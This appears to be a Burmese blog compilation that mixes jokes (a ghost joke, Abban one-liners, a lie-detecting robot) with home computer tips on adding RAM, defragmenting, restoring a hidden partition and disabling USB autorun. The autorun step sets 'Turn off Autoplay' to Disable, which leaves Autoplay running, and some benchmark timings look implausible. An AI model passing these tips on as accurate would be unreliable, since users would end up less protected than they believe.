ဆင်နွှဲပြီး အိမ်ပြန်လာခဲ့ကြတယ်။ သူတို့ရဲ့ အိမ်အပြန်လမ်းမှာ သင်္ချိုင်းတစ်ခုရှိတယ်။ လူငယ်နှစ်ယောက်ဟာ စူးစမ်းလိုစိတ်နဲ့ သင်္ချိုင်းထဲဖြတ်လျှောက်ဖို့ စိတ်ကူးလိုက်တယ်။ လျှောက်ရင်းလျှောက်ရင်း တစ်နေရာရောက်တော့ "ရှ...ရှ..ရှ"နဲ့ အသံတစ်သံကို သူတို့ကြားလိုက်တယ်။ နှစ်ယောက်စလုံး လန့်ပြီး အသံလာရာဖက်ကို ကြည့်လိုက်တော့ မှတ်တိုင်တစ်ခုကို ကိုင်ပြီး ရပ်နေတဲ့ အဘိုးအိုတစ်ဦးကို တွေ့လိုက်တယ်။

လူငယ်ထဲက တစ်ယောက်က "အဘိုး.. ဒီလောက်ညဥ့်နက်နေပြီ ဘာလုပ်နေတာလဲ? ကျွန်တော်တို့က မကောင်းဆိုးဝါးထင်နေလို့ဗျ"
လို့ မေးတော့ အဘိုးအို စကားကြောင့် လူငယ်နှစ်ယောက် သုတ်တင်ပြေးကြတော့တယ်။အဘိုးအို ပြောလိုက်တာက " ငါ့နာမည် စာလုံးပေါင်းမှားနေလို့ကွ" ဟူတည်း။

၃)
တစ်ချို့တရုတ်တွေက ၄ ဂဏန်းကို လဒ်မရှိတဲ့ဂဏန်း၊ ကံမကောင်းတဲ့ ဂဏန်းလို့ အယူရှိကြတယ်။ "၄" ဂဏန်းရဲ့ အသံထွက်က "သေ"ဆိုတဲ့ တရုတ်စကားနဲ့ အသံထွက်တူနေလို့ပါတဲ့။ ဒါကြောင့် တစ်ချို့စားသောက်ဆိုင်မှာ ခုံနံပါတ် ၄ ကိုမထားသလို တိုက်အထပ် ၄ကိုလည်း ၅ထပ်လို့ ခေါ်ကြတယ်။ ဒီလိုနဲ့.....

ဖုန်းနံပါတ်တွေကို လက်နဲ့ လှည့်ရတဲ့ခေတ်တုန်းက အိမ်တစ်အိမ်မှာ ၄ဂဏန်းပဲပါတဲ့ ဖုန်းနံပါတ်တစ်ခု ရှိခဲ့တယ်။ အဲဒီနံပါတ်ကြောင့် အမည်မသိဖုန်းတွေ၊ အကြောင်းအရာမရှိတဲ့ ဖုန်းတွေ မကြာခဏ လက်ခံခဲ့ရတယ်။ တစ်ညမှာ လူကြီးတွေအိပ်ပြီး လူငယ်တစ်ယောက်တည်း ကျန်နေတုန်း ဖုန်းဝင်လာခဲ့တယ်။ ဖုန်းတစ်ဖက်မှာ လူတစ်ယောက်က အသံတုန်ချိချိနဲ့ ...

" ဟလို... ဟလို.. ၁၁၉ကို ဖုန်းဆက်ပေးပါ" လို့ ပြောတဲ့အသံကို ကြားတော့ လူငယ်လန့်ပြီး ဖုန်းကို ပစ်ချလိုက်မိတယ်။ မကြာဘူး.. ဖုန်းမြည်လာပြန်တယ်။ အရင်အသံလိုပဲ..

" ဟလို... ဟလို.... ၁၁၉ ကို ဖုန်းဆက်ပေးပါ" လို့ ပြောတော့ လူငယ်က အရဲစွန့်ပြီး


" ဘာဖြစ်လို့ ခင်ဗျားကိုယ်တိုင် မဆက်တာလဲ" လို့ မေးလိုက်တယ်။ ဖုန်းတစ်ဖက်က ပြန်ပြောလိုက်တာက

" မြန်မြန်ဆက်ပေးပါ.. ကျွန်တော် မခံနိုင်တော့ဘူး.. ကျွန်တော့်လက်ညှိုး ဒီ နံပါတ်၎ နေရာမှာ ညှပ်နေလို့" ပါ ဟူတည်း။

တွေးတွေးပြီးရယ်.. ကြောက်ကြောက်နဲ့ ရယ်....း)

ဟာသ











မြန်မာ ဟာသ လေးတွေပါ ..... ဖတ်ကြည့်ကြပါဦး

(၁) သေပြီဆရာ

ရွာတစ်ရွာမှာရှိတဲ့ ဦးလေးကြီး လင်မယား ( ၂ ) ယောက်မှာ သမီး ( ၇ )ယောက်ရှိတယ်တဲ့။
အချိန်တန်တော့ သမီးတွေကို အိမ်ထောင်ချပေးတော့

ပထမဆုံးသမီးက ထန်းတစ်ပင် ရွာသားနဲ့ အိမ်ထောင်ကြတယ်။
ကလေး တစ်ယောက်မွေးတယ်။

ဒုတိယသမီးက ညောင်နှစ်ပင် ရွာသားနဲ့ အိမ်ထောင်ကြတယ်။
သူက ကလေး နှစ်ယောက်မွေးတယ်။


တတိယသမီးက သုံးဂွ ရွာသားနဲ့ အိမ်ထောင်ကြတယ်။
ကလေး သုံးယောက်မွေးတယ်။


လေးယောက်မြောက် သမီးက လေးမျက်နှာ ဘုရားဘက်က ရွာသားနဲ့ အိမ်ထောင်ကြတယ်။
ကလေး လေးယောက်မွေးတယ်။


ငါးယောက်မြောက် ငါးဇွန်ဘက်က ရွာသားနဲ့ အိမ်ထောင်ကြတယ်။
သူတို့ကြတော့ ကလေး ငါးယောက်မွေးတယ်။


ခြောက်ယောက်မြောက် ချောက် ( ခြောက် ) ရွာသားနဲ့ အိမ်ထောင်ကြတယ်။
သူတို့က ကလေး ခြောက်ယောက်မွေးတယ်။

ဒါနဲ့ နောက်ဆုံး ခုနှစ်ယောက်မြောက် သမီးလေးက သူ့အဖေကိုပြောတယ် ။ အဖေ...သမီးမှာ ရည်းစား ရှိနေပြီတဲ့။ သမီးလက်ထပ်ချင်တယ်ဆိုတော့ ၊ အဖေက သူ့သားမက်ကို အိမ်ကို ခေါ်ခဲ့ပါဦး သူကြည့်ရအောင်တဲ့။ ဒါနဲ့ သမီးလည်း ခေါ်လာခဲ့ပါတယ်။ ခေါ်လာတဲ့ အခါ သူ့အဖေက မင်းက ငါ့သမီးကို လက်ထပ်ချင်တာကတော့ ဟုတ်ပါပြီ။ မင်းက ဘယ်နယ်ကလဲကွဆိုတော့ သားမက်လောင်း ပြောလိုက်တာက

ကျွန်တော်က " သုံးဆယ် " ကပါလည်းဆိုရော ကောင်မလေးအဖေ ပါးစပ်က ဟေ....................

( ၂) မလွဲသောအမှား

အလုပ်တစ်နေရာအတွက် လူတွေ့စစ်ဆေးရာ လူငယ်တစ်ဦးအလှည့်သို့ရောက်လာ၏။

ရွေးချယ်သူ ။ မင်းနာမည်
လူငယ် ။ မောင်လှ
ရွေးချယ်သူ ။ အထက်လူကြီးက မေးရင် " ဆရာ " ထည့်ဖြေရတယ်ကွ။ ပြန်ပြော
လူငယ် ။ ဟုတ်ကဲ့ " ဆရာမောင်လှ "


( ၃ ) ဖြစ်ရမယ်

မျက်နှာမသာမယာဖြင့် ကိုချူချာ အိမ်ပြန်ရောက်လာသည်။

ဦးလေးဖြစ်သူက ။ ဘာဖြစ်လာတာလဲ ချူချာ

ချူချာ ။ ရေးကူးသင်တန်းက ထုတ်ခံရလို့ဗျ

ဦးလေး ။ ဘာဖြစ်လို့လဲကွ

ချူချာ ။ ရေကန်ထဲ ရှုးပေါက်မိလို့ဗျ

ဦးလေး ။ ဟေ...သူများတွေလည်း ဒီလိုပဲ မသိမသာလေး ပေါက်နေကြတာလေ

ချူချာ ။ အဟီး......ကျွန်တော်က ဒိုင်ဗင်စင်ပေါ်ကနေ တက်ပေါက်မိလို့ပါ


( ၄ ) ပါတော့ ပါသွားတယ်

ကျောင်းတက်ချိန် နောက်ကျမှ ကျောင်းသို့ ကျောင်းသားတစ်ယောက် ရောက်လာ၏။ ထိုအခါ အလွန်စိုးရိမ်
တက်သော ဆရာက

ဆရာ ။ ဘာဖြစ်လို့ကျောင်းနောက်ကျတာလဲ
ကျောင်းသား ။ လမ်းမှာ ရိုက်လုတာ ခံရလို့ပါ ဆရာ
ဆရာ ။ ဖြစ်မှ ဖြစ်ရလေကွာ.....ဒါနဲ့ ဘာတွေများ ပါသွားသေးလဲ
ကျောင်းသား ။ ကျွန်တော့် အိမ်စာတွေတော့ ပါသွားတယ် ဆရာ

Thursday, October 18, 2012

* ဟာသ ပါပဲ အာဘန်းရယ် …

☻☻☻☻☻☻☻☻☻☻☻☻☻☻☻☻☻☻
အာဘန်း ~ “ကျွန်တော်ဂုဏ်ယူတယ်ဗျာ။ ကျွန်တော့သားက ဆေးတက္ကသိုလ်မှာလေ”
မိတ်ဆွေ ~ “ဟုတ်လား။ သူက ဘာတွေ လေ့လာနေတာလည်းဗျ”
အာဘန်း ~ “သူကလေ့လာနေတာ မဟုတ်ဘူးဗျ။ လုတွေက သူ့ကို လေ့လာနေကြတာ”
☻☻☻☻☻☻☻☻☻☻☻☻☻☻☻☻☻☻
အာဘန်း ~ “ဆရာရယ် ကျွန်တော်လေ ညတိုင်း ဘောလုံးကစားနေတယ်လို့ အိပ်မက်မက်နေတယ်”
ဆရာဝန် ~ “ဒီဆေးလေးသာ သောက်လိုက်ပါ။ ခင်ဗျား အဆင်ပြေသွားလိမ့်မယ်”
အာဘန်း ~ “မနက်ဖြန်မှ သောက်လို့ရလား ဆရာ။ ဒီညက ဖိုင်နယ်ပွဲမို့ပါ”
☻☻☻☻☻☻☻☻☻☻☻☻☻☻☻☻☻☻
အာဘန်း ~ “ငါသေရင် မင်းနောင်အိမ်ထောင်ပြုမှာလား မိန်းမ”
အာဘန်းရဲ့ဇနီး ~ “မပြုပါဘူးရှင်။ ကျွန်မညီမနဲ့ပဲ သွားနေတော့မှာပေါ့။ ဒါနဲ့
ကျွန်မသေရင်ရော ရှင်နောက် အိမ်ထောင်ပြုမှာလား”
အာဘန်း ~ “ငါလည်း မပြုပါဘူးကွာ။ ငါလည်း မင်းညီမနဲ့ပဲ သွားနေတော့မှာပေါ့”
☻☻☻☻☻☻☻☻☻☻☻☻☻☻☻☻☻☻
အာဘန်း ~ “လူတွေက ငါ့ကိုဘုရားလို့ ထင်ကြတယ်ကွ”
အာဘန်းရဲ့ဇနီး ~ “ရှင်က ဘယ်လိုလုပ်ပြီး သိတာတုန်း”
အာဘန်း ~ “ငါဒီနေ့ ပန်းခြံထဲသွားတော့ လူတိုင်းက “ဘုရား ဘုရား ခင်ဗျားလာပြန်ပြီ”
လို့ ပြောကြတယ်ကွ”
☻☻☻☻☻☻☻☻☻☻☻☻☻☻☻☻☻☻
အာဘန်းက ရဲအရာရှိကို တိုင်ကြားနေပါတယ်။
“ရဲအရာရှိကြီးရယ် ကျွန်တော့်အိမ်မှာ TV ကလွဲလို့ တခြားဘာပစ္စည်းမှ မကျန်တော့ဘူး”
ရဲအရာရှိ ~ “သူခိုးက TV ကိုတော့ ဘာလို့များ ယူမသွားပါလိမ့်”
အာဘန်း ~ “ကျွန်တော်က TV မှာပြတဲ့သတင်း ကြည့်နေတာကိုး”
☻☻☻☻☻☻☻☻☻☻☻☻☻☻☻☻☻☻
ကျောင်းနေတုန်းကအချိန်တွေမှာ အာဘန်းကို ဘယ်လိုပုံစံနဲ့ အမှတ်ရနေပါသလဲ?
အားဘန်းဟာ ဆရာမ ကျောက်သင်ပုန်းကို ဖျက်တိုင်း သူ့မှတ်စုစာအုပ်ထဲက စာတွေကို
ခဲဖျက်နဲ့ လိုက်ဖျက်ပစ်တတ်တဲ့သူပေါ့။
☻☻☻☻☻☻☻☻☻☻☻☻☻☻☻☻☻☻
အာဘန်းဟာ ဘားဆိုင်တစ်ဆိုင်ထဲမှာ ထိုင်နေတုန်း သူ့ဆယ်လူလာဖုန်းက မြည်လာပါတယ်။
သူက ကောက်ကိုင်လိုက်ပြီး “ဟယ်လို ငါ ဒီမှာရှိနေတာကို မင်းဘယ်လိုလုပ်သိလဲဟင်”
လို့ မေးလိုက်ပါတယ်။
☻☻☻☻☻☻☻☻☻☻☻☻☻☻☻☻☻☻
အာဘန်း ~ “ဘာလို့အဲဒီလူတွေအားလုံး ပြေးနေကြတာလည်း”
ဘေးကလူ ~ “ဒါပြိုင်ပွဲလေ။ နိုင်တဲ့သူက အဲဒီဆုဖလားကို ရမှာပေါ့”
အာဘန်း ~ “နိုင်တဲ့သူတစ်ယောက်ပဲ အဲဒီဆုဖလားကိုရမှာကိုများ တခြားလူတွေက
ဘာလို့များ ပြေးနေကြတာလည်း”
☻☻☻☻☻☻☻☻☻☻☻☻☻☻☻☻☻☻
အာဘန်းက သူ့ရဲ့အစေခံလေးကို ပြောလိုက်ပါတယ် “ပန်းပင်တွေ ရေသွားလောင်းစမ်း”
အစေခံလေး ~ “အပြင်မှာ မိုးတွေရွာနေပါပြီ ဆရာ”
အာဘန်း ~ “အဲဒါဘာဖြစ်လည်း။ ထီးယူပြီး သွားလေ…”
☻☻☻☻☻☻☻☻☻☻☻☻☻☻☻☻☻☻

ဟာသ











လိမ်ပြီးပြောရင် ပါးရိုက်တဲ့စက်ရုပ်



၂၁ ရာစုအစမှာပဲ စက်ရုပ်တွေဟာလူတစ်ယောက်လိမ်တယ်မလိမ်ဘူး ဆိုတာကိုမျက်နာကြည့်ပြီးသိနိုင်အောင် တီထွင်နိုင်ခဲ့ပါပြီ။ ထူးခြားချက်အနေနဲ့ အဲဒီစက်ရုပ်ဟာလိမ်တဲ့သူကိုချက်ချင်းပါးထရိုက်တာပါပဲ။ မယုံဘူးလား… အောက်ကအဖြစ်အပျက်ကိုဖတ်ကြည့်ပါ။
ကိုဇော်ဂျီနဲ့ပွင့်တို့ရဲ့သားလေး မောင်မောရစ်တစ်ယောက်အိမ်ကိုနောက်ကျပြီးမှပြန်ရောက်လာသည်။
ကိုဇော်ဂျီ ။ ။ သားမင်းဘာလို့ကျောင်းနောက်ကျတာ
လဲ။
မောင်မောရစ် ။ ။ ဒီနေ့ကျောင်းကအချိန်ပိုရှိလို့နောက်ကျတာအဖေရဲ့။
ဖြန်း…………………………………..
အံ့သြစရာကောင်းလောက်အောင်ပဲ ဘေးမှာရှိနေတဲ့စက်ရုပ်က မောင်မောရစ်ပါးကိုရိုက်ထည့်လိုက်သည်။
ကိုဇော်ဂျီ ။ ။ ဒီစက်ရုပ်က လိမ်ပြောတာကိုအာရုံခံစားနိုင်တဲ့စက်ရုပ်ကွ။ မှန်မှန်ပြောစမ်း။ လိမ်ပြောရင်မင်းကိုပါးထပ်ရိုက်လိမ့်မယ်။
မောင်မောရစ် ။ ။ ဟုတ်ကဲ့. .. ကျနော်ရုပ်ရှင်သွားကြည့်နေတာပါ။
ကိုဇော်ဂျီ ။ ။ ဘာရုပ်ရှင်လဲ။
မောင်မောရစ် ။ ။ “The Ten Commandments” ဇာတ်ကားပါ။
ဖြန်း……………………………………….
စက်ရုပ်ကရိုက်ထည့်လိုက်ပြန်သည်။ မောင်မောရစ်တစ်ယောက်မလိမ်ရဲတော့ပေ။
မောင်မောရစ် ။ ။ ဟုတ်…ဟုတ်.. Sex Queen ဇာတ်ကားပါ။
ကိုဇော်ဂျီအတော်ပေါက်ကွဲသွားသည်။
ကိုဇော်ဂျီ ။ ။ မင်းမရှက်ဘူးလားကွ ဒါမျိုးဇာတ်ကားကြည့်တာ။ မင်းအသက်အရွယ်လောက်တုန်းက ငါဒါမျိုးရှက်စရာဘယ်တုန်းကမှ မလုပ်ခဲ့ဘူး။
ဖြန်း……………………………………………………
တော်တော်လေးကိုအသံကျယ်ပါဧ။်။ ကိုဇော်ဂျီကိုစက်ရုပ်ကပါးချလိုက်ခြင်းပင်ဖြစ်ချေသည်။
ဆူညံဆူညံအသံများကြောင့်မိခင်ဖြစ်သူ ပွင့်မီးဖိုချောင်မှထွက်လာပြီးပြောလိုက်သည်။
ပွင့် ။ ။ ရှင်လည်းလိမ်တာပါပဲလား။ အင်းလေ.. ရှင်နဲ့တူမှာပေါ့ အဲဒါရှင့်သားပဲလေ ။
ဖြန်း……………………………………………………………
ဒီတစ်ခါစက်ရုပ်ဧ။် ပွင့်ကိုပါးရိုက်ချက်ကား အသံအကျယ်ဆုံးဖြစ်တော့သည်။

Laptop Speed ကိုမြန်အောင် ပြန်လုပ်မယ်

(Nayzawlin မှ ပြန်လည်မျှဝေလိုက်ပါတယ်)

သင့်ရဲ့ Laptop ဟာ ၀ယ်ခါစတုန်းက ထက်စာရင် အလုပ်လုပ်တဲ့နေရာမှာ ပိုပြီးနှေးကွေးသွားပြီဆိုတာ သင်သတိပြုမိတယ် ဆိုပါစို့။ သင်ဘာလုပ်မလဲ။ အလုပ်လုပ်တာ ပိုမြန်မယ့် နောက်အသစ်တလုံး ထပ်ဝယ်ဖို့ကလည်း သင့်အတွက် ခက်ခဲကောင်း ခက်ခဲ နေပါလိမ့်မယ်။

အဲဒီအတွက် အကုန်အကျသက်သာမယ့် ပြုပြင်မွမ်းမံမှုတွေကို သင်ကိုယ်တိုင် ပြုလုပ်ရ တော့မှာပါ။ ဒါဆိုရင်တော့ အောက်မှာ ရေးသားထားတဲ့ အချက် ၇ ချက်ကို စမ်းသပ် လုပ်ကိုင်ကြည့်ပါ။ သင့် Laptop ပိုမိုမြန်ဆန် လာတာ တွေ့ရပါလိမ့်မယ်။

အောက်မှာဖော်ပြထားတဲ့ အချက်တွေဟာ အမေရိကန်အခြေစိုက် Laptop မဂ္ဂဇင်းအဖွဲ့က လက်တွေ့ စမ်းသပ်ထားတဲ့ အချက်တွေပါ။ စမ်းသပ်တဲ့နေရာမှာ အင်မတန်နှေးကွေးတဲ့ xp နဲ့ vista ၀င်းဒိုးစနစ် သုံး Laptop နှစ်လုံးကို အသုံးပြုခဲ့ပါတယ်။

၁။ သင့် Laptop ကို memory(၀ါ)RAM ပမာဏထပ်တိုးပါ

RAM လို့ခေါ်တဲ့ memory ပမာဏထပ် တိုးတာဟာ အလွန်နှေးကွေးတဲ့ ကွန်ပြူတာတွေကို ပိုမို မြန်ဆန်အောင် လုပ်ပေးမယ့် နည်းများစွာထဲက တခုပါဘဲ။ RAM ထုပ်လုပ်တဲ့ Crucial စက်ရုံရဲ့အဆိုအရ ဆိုရင် ၀င်းဒိုးXP အတွက် RAM ပမာဏ အနည်းဆုံး 1GB ရှိရမှာဖြစ်ပြီး ၀င်းဒိုးVista အတွက် ကတော့ အနည်းဆုံး 2GB ရှိရမှာပါ။ RAM ပမာဏ ပိုများတာနဲ့အမျှ သင့်ကွန်ပြူတာဟာ ပိုမိုမြန်ဆန်လာမှာဖြစ်ပြီး ပရိုဂရမ်များကိုလည်း တပြိုင်တည်းအသုံးပြုနိုင်လိမ့်မယ်လို့ သိရပါတယ်။

Laptop မဂ္ဂဇင်းအဖွဲ့ရဲ့စမ်းသပ်မှုအရ 358 MB အရွယ်ရှိတဲ့ ဖိုင်တခုကို RAM ပမာဏ 1GB နှင့် zip ဖိုင်လုပ်ရာတွင် ၁ နာရီ ၄၅ မိနစ်ခန့်အချိန်ကြာခဲ့ပြီး RAM ပမာဏ 2GB နှင့်အစားထိုးစမ်းသပ်ရာတွင် ၁ နာရီ ၁၀ မိနစ်ခန့်သာ အချိန်ကြာခဲ့သည်။


၂။ ကွန်ပြူတာတွင်းရှိဖိုင်များကို Disk Defragmenter အသုံးပြုပြီးနေရာတကျစီပါ

သင့် Laptop ထဲကဖိုင်တွေကို တလမှာဘယ်နှစ်ခါ စီပေးရမယ်လို့တော့ အတိအကျပြောလို့မရပါ ဘူး။ ဘာဖြစ်လို့လဲဆိုတော့ ဒါဟာ သင့်ရဲ့ကွန်ပြူတာ အသုံးပြုမှုအချိန်ပမာဏ ပေါ်မူတည်ပြီးမှ ဆုံးဖြတ်လို့ ရမှာဖြစ်လို့ပါဘဲ။ သင့်ကွန်ပြူတာဟာ အသုံးပြုမှုများမယ်၊ Software တွေသွင်းလိုက်၊ဖျက်လိုက်မကြာ ခဏလုပ်မယ်ဆိုရင် ကွန်ပြူတာ Hard Disk ထဲမှာရှိတဲ့ ဖိုင်တွေဟာ ဟိုတစ ဒီတစနဲ့ပြန့်ကျဲနေပါလိမ့်မယ်။

အဲဒီအခါမှာ သင်က ကွန်ပြူတာကို ဖိုင်တခု(သို့)application တခုကို ဖွင့်ခိုင်းလိုက်မယ်ဆိုပါစို့။ သင့် ကွန်ပြူ တာဟာ သူ့ရဲ့ Hard Disk ထဲမှာရှိတဲ့ ပြန့်ကျဲနေတဲဖိုင်တွေထဲက သင်လိုချင်တာကို တစစီလိုက်ကောက် ပေးနေရတဲ့အတွက် အချိန်မကြာသင့်ဘဲကြာသွားရပါတယ်။ သင့်ကွန်ပြူတာထဲက ဖိုင်တွေကို စီပေးချင်း အားဖြင့် ဒီအချိန်ယူမှုကို လျော့ချနိုင်ပါတယ်။ အဲဒီအတွက် Start – All Programs – Accessories – System Tools ကိုအဆင့်ဆင့်သွားပါ။ System Tools ထဲက Disk Defragmenter ကို နှိပ်ပြီး သင့်ကွန်ပြူတာ Hard Disk ထဲက ဖိုင်တွေကို နေရာတကျစီပေးလိုက်ပါ။

Laptop မဂ္ဂဇင်းအဖွဲ့ရဲ့ စမ်းသပ်မှုအရဆိုရင် ဖိုင်စီပြီးနောက်ပိုင်း ကွန်ပြူတာဖွင့်တဲ့နေရာမှာ ၀င်းဒိုး တက်တာ ပိုမြန်လာတာကိုတွေ့ရပါတယ်။ နောက်ပြီး ပရိုဂရမ်တွေကို ဖွင့်တဲ့နေရာမှာလည်း ပိုမိုမြန်ဆန် လာပါတယ်။ နောက်ထပ် စမ်းသပ်မှုတခုအနေနဲ့ ‘find me.txt’ လို့အမည်ပေးထားတဲ့ ဖိုင်တခုကို Hard Disk ရဲ့ အတွင်းကျကျနေရာမှာ သိမ်းဆည်းပြီး ကွန်ပြူတာကို ရှာခိုင်းခဲ့ပါတယ်။ ဖိုင်မစီပေးခင်တုန်းကဆိုရင် ရှာခိုင်းတဲ့ဖိုင်ကို တွေ့ဖို့ ၂၂ စက္ကန့်အချိန်ကြာပြီး ဖိုင်စီပြီးနောက်ပိုင်းရှာ ခိုင်းတဲ့အခါ ၆ စက္ကန့်သာ အချိန် ကြာခဲ့ပါတယ်။

Hard Disk ထဲက partition တစ်ပိုင်းပျောက်နေပါလား

ဒီတစ်ခါတော့ သူငယ်ချင်းတစ်ယောက်ဖြစ်တဲ့ error တစ်ခု ကိုပြောပြချင်ပါတယ်။ သူက ဝင်းဒိုးတင်ပြီးတဲ့ နောက်ပိုင်းမှာ partiton ခွဲထားတာက သုံးခု နှစ်ခုပဲ ပေါ်နေတယ်။ အဲဒါဘယ်လိုပြန်ပေါ်အောင်လုပ်ရမယ်ဆိုတာ ပြောပြပါ့မယ်။ မသိသေးသောသူများ အတွက်ပါ။  အရင်ဆုံး My computer ပေါ်ကို right click ထောက်လိုက်ပါ။ ပြီးရင် Disk Management ကလစ်ပေးပါ။ ပြီးရင် ပျောက်နေသော partition ကိုရှာပါ။ အဲဒီပေါ်ကို right click ထောက်ပါ။ change Drive latter and paths ကို ကလစ်ပေးပါ။ အဲဒီမှာ  C ရယ် D ရယ်က လွဲလို့ တခြား တစ်ခုခုကိုရွေးပါ။ ပြီးရင် ok ပေးပါ။ ဒါဆိုရင် ပျောက်နေတဲ့ partition ပေါ်ပါပြီ။ 





အဆင်ပြေပါစေ........

အားလုံးကိုလေးစားလျက်.......

USB Stick မတပ်မီ ဗိုင်းရပ်စ် မ၀င်အောင် ကာကွယ်ကြမယ်


ဗိုင်းရပ်စ် အန္တရာယ် ကာကွယ်ဖို့အတွက် နည်းလမ်းများစွာ ရှိပါတယ်။ ဒါပေမယ့် အမှတ်တမဲ့နဲ့ မကွာကွယ်ကြတာများပါတယ်။ Kasper 2010 လို့ USB ကနေတက်လာတဲ့ ဗိုင်းရပ်စ် မှန်သမျှကို အော်တို Scan ဖက်ပေးတဲ့ ကောင်မျိုးဆိုရင်တော့ အကြောင်းမဟုတ်ပါဘူး။ အားပျော့တဲ့ anti-virus တွေကို ကိုယ်စက်မှာ တင်ထားမိရင်တော့ဗိုင်းရပ်စ်တွေဟာ မိမိကွန်ပျူတာထဲကို အလွယ်တကူ ၀င်ရောက်လာနိုင်ပါတယ်။

အဲ့လိုဝင်ရောက်လာတာ ကိုကာကွယ်ဖို့နည်းလမ်းများ စွာထဲက အခုနည်းလမ်းတစ်ခု ကိုရွေးပါမယ်။ ကွန်ပျူတာသို့ အများဆုံးဗိုင်းရပ်စ် ဝင်ရောက်လာနိုင်တာကတော့ USB stick နဲ့ Extra HD တွေကပါ။ USB port မှာ USB stick ကို တပ်လိုက်တာနဲ့ Window စနစ်က autorun ကို လက်ခံပြီး ဖိုင်တွေကို ချိတ်ပါတယ်။ အဲဒီမှာ ဗိုင်းရပ်စ်ပါတဲ့ ဖိုင်လည်း အလွယ်တကူ ချိတ်မိသွားပါတယ်။

ဒီတော့ autorun ကို ပိတ်ထားမှအဆင်ပြေပါလိမ့်မယ်...။

ဒါဆိုရင်တော့ autorun ကိုပိတ်လိုက်ရအောင်...

- Start/Run (box) မှာ gpedit.msc လို့ရိုက်ပါ။

- ပေါ်လာတဲ့ Group Policy (box) ရဲ့ User Comfiguration အုပ်စုအောက်က Administrative Templates ကို ရွေးချယ်ဖွင့်ပါ။

- System ကို ကလစ်လုပ်ပါ။ တစ်ဖက် မြင်ကွင်းအတွင်း Setting များတွင် Turn of Autoplay ကို ကလစ်နှိစ်ချက်နှိပ်ပါ။

- Turn of Autoplay Properties (box) ပေါ်လာပါမည်။ Disable ကိုရွေးချယ်ပါ။

အားလုံး အဆင်ပြေ ပါစေလို့ ဆုတောင်းပေး လိုက်ပါတယ်ဗျာ။